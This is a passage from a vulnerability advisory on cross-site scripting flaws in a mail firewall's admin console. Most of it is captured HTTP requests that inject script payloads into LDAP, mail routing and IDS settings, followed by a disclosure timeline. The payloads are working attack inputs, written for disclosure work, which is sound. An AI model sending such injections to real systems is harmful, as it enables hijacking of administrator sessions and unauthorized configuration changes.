2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:56 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #14 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #15 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #16 ] :.

POST
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 100
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRoutingInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&input2=&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #17 ] :.

POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2237
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMenu%2CMailIDSMenu%2CApplicationLevelMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows%5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=enable_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.attrValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.langTagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId=2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2&rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1-65535%5D&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTagId=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attrType=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D.attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D.attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:24:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ TIMELINE ] :.

22/Mar/2007	- We publish the advisory.
07/Mar/2007	- Second contact. Provider doesn't answered.
27/Feb/2007	- First contact with provider.
19/Feb/2007	- Vulnerabilities founded.

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux